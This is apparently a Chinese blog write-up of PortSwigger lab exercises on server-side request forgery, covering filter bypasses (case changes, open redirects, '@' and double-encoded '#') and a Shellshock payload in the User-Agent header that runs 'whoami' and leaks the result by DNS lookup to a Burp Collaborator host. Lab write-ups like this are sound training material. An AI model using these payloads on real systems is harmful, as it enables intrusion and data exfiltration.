SSRF专向练习(挖SRC错失SSRF的血汗泪)

image-20220717180542040
image-20220717180542040

SSRF专向练习(挖SRC错失SSRF的血汗泪)

前一阵有几天挖SRC来着,当时发现SSRF了,当时脑抽竟然给错过了,后来反应过来了,但是当时也没记录,现在都忘了是哪个资产了,算了,过去的让他过去吧,当然这也证明了我对SSRF的理解还不够,所以干脆给BURP实验室的SSRF给梭哈了(为了不漏点,截图时http包里的其它字段全删了,反正也不影响)

微信公众号:小惜渗透,欢迎大佬一起交流进步


Burp如何检测SSRF

推荐插件:ssrfking

https://github.com/ethicalhackingplayground/ssrf-king/releases/tag/v1.12

这个我们需要知道Burp的Collaborator client功能,它就相当于一个DNSlog,首先点击Burp--Burp Collaborator client,然后点击Copy to clipboard复制一下地址

image-20220717175717371
image-20220717175717371

然后粘贴Collaborator client地址到插件的配置中

image-20220717175916792
image-20220717175916792

然后点点点

image-20220717175947683
image-20220717175947683

1. 针对本地服务器的基本 SSRF

因为SSRF一般的发生条是在服务器对其它服务器发起请求的时候,所以尝试寻找此类地点,随便点进去一个商品发现下方存在检查库存功能,点击检查库存按钮后查看http请求包发现参数包含url地址

image-20220716172515219
image-20220716172515219
image-20220716172546630
image-20220716172546630

尝试将url改成服务器本地localhost,下边多出来一块

image-20220716172743745
image-20220716172743745

点删除后,出现下边提示

image-20220716172834600
image-20220716172834600

主要是后半句,本地回环地址可以免认证,那正好这个删除的请求也是get请求,所以直接再通过刚才的按钮发出删除请求,包如下

image-20220716173908327
image-20220716173908327

成功

image-20220716174003887
image-20220716174003887

2. 针对另一个后端系统的基本 SSRF

根据提示可知在192.168.0.X的8080端口存在管理界面,所以我们还是通过检查库存功能,然后利用爆破寻找IP

如下图所示设置爆破位置

image-20220717125556316
image-20220717125556316

payload为0-255的数字

image-20220717125624813
image-20220717125624813

爆破出来了,214

image-20220717125806558
image-20220717125806558

于是根据上一关的删除请求构造payload

image-20220717130132537
image-20220717130132537

成功啦

image-20220717130142028
image-20220717130142028

3. 带有基于黑名单的输入过滤器的 SSRF

这关和以往的不同就是存在轻微的防御,我们还是通过检查库存功能访问localhost时候,发现被拦截

image-20220717132402233
image-20220717132402233

那我首先想到的就是更改大小写,没想到就绕过了,我去这也太轻松了

image-20220717132443494
image-20220717132443494

那同样构造删除用户请求

image-20220717132526751
image-20220717132526751

成功了

image-20220717132537106
image-20220717132537106

4. 通过开放重定向漏洞绕过过滤器的 SSRF

image-20220717132713253
image-20220717132713253

先看题意,我们不能直接通过构造包来对192.168.0.12发出请求,因为库存检查器已经被限制只能访问本地程序,那既然如此我想一定是借助本地的API再对192.168.0.12发出请求,所以先去逛逛,发现点击Next product的包url有点不同寻常

/product/nextProduct?currentProductId=10&path=/product?productId=11

ok,那不就是它吗?,然后我们利用检查库存功能对此url发起请求,另其访问192.168.0.12

image-20220717140733598
image-20220717140733598

还不对,回头重新看一眼原本的检测库存的包,明白了,原来用的是相对路径,而多此一举给它加了个绝对路径,那么重新用相对路径发请求,结果成功了

image-20220717141246983
image-20220717141246983

ok,那就构造删除carlos用户

image-20220717141410318
image-20220717141410318

成功

image-20220717141418062
image-20220717141418062

5. 带外检测的盲 SSRF

image-20220717142254423
image-20220717142254423

清晰明了,问题发生在加载产品时的Referer字段中,不过下边也说了必须使用Burp Collaborator默认公共服务器,可以简单理解成它就是一个DNSlog,我先抓到访问一个产品的包

image-20220717142541540
image-20220717142541540

然后去获取一个Collaborator地址,点击Burp--Burp Collaborator client,然后点击copy to clipboard复制一个地址,然后将刚才的访问产品的包增加一个Referer字段,将复制过来的值粘贴(还得手动加http://),发现Burp的Collaborator这边有流量了

image-20220717143435295
image-20220717143435295

也顺利通过了

image-20220717143501405
image-20220717143501405
当我们发现网站存在一些分析插件的时候,可以利用此方法测试,

6. 带有基于白名单的输入过滤器的 SSRF

跟黑名单那关一样,只不过这次是白名单,先按照老样子看看会出什么提示,观察一下原stockApi的值,

image-20220717143918799
image-20220717143918799

既然是白名单,我盲猜会检测url为stock.weliketoshop.net,那么我先修改一下试试,来了一个提示

image-20220717144003428
image-20220717144003428

果然和猜想一样,不过没有关系,我们直接构造如下url

stockApi=http://localhost@stock.weliketoshop.net

发现可以访问,@在url中表示重定向,例如我们构造一个url为http://www.baidu.com@www.youdao.com,那最终访问其实是有道,所以我们可以利用这种方式来进行白名单的绕过,但是现在不能访问到我们的目的地址也就是localhost,所以想办法将后边的“注释”掉,还有个符号也就是#在url中表示网页的位置,我们平时访问一些网站的时候后有顶部底部两个按钮,点击后并没有新请求而是在当前页面到达最顶端和最底部,一般url如下方举例一样

顶部

http://xxx.com/#top

底部

http://xxx.com/#down

所以我们其实可以在@前面加上#来将后边的相当于“注释”掉,这样既可以访问localhos,又能绕过检测,尝试一下

image-20220717153206278
image-20220717153206278

没有过检测,没关系我们将#进行url编码,还不行,最后二次编码成功了

image-20220717153335817
image-20220717153335817

不过既然二次编码好用的话,是不是删除@也可以呢,如果可以就不用多次一举了

image-20220717153427709
image-20220717153427709

还不行,看来后端对url做了判定,也就是正常情况可以通过,或者在@后边也可以通过


7. 使用 Shellshock 开发的盲 SSRF

现来了解一下Shellshock(CVE-2014-6271)

Bash 4.3以及之前的版本在处理某些特殊构造的环境变量时存在安全漏洞,向函数环境变量值后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行任意的shell命令,甚至完全控制目标系统

受到该漏洞影响的bash使用的环境变量是通过函数名称来调用的,以“(){”开头通过环境变量来定义的。而bash在处理这样的“函数环境变量”的时候,并没有以函数结尾“}”为结束,而是一直执行其后的shell命令

比如下面先定义了个特殊构造的“函数环境变量”(正确定义函数变量应该是foo='(){函数代码};'),然后执行bash后就会自动执行foo环境变量函数后面那块

这里我们需要用到爆破模块,然后将变量设置放在Referer里,如下图

image-20220717163627344
image-20220717163627344

紧接着,因为Shellshock需要影响环境变量,而我们在请求中UA通常是保存在环境变量HTTP_USER_AGENT的,所以再通过它构造payload,在shell中反引号标记的为变量,当在脚本中需要执行一些指令并且将执行的结果赋给变量的时候需要使用“反引号”。

User-Agent: () { :; }; /usr/bin/nslookup `whoami`.xxxxxxxx.burpcollaborator.net

将爆破payload设置成数字从0到255,进行爆破

image-20220717165022623
image-20220717165022623

获取名字,提交即可

image-20220717165154194
image-20220717165154194
posted @ 2022-07-17 18:16  小惜渗透  阅读(323)  评论(0编辑  收藏  举报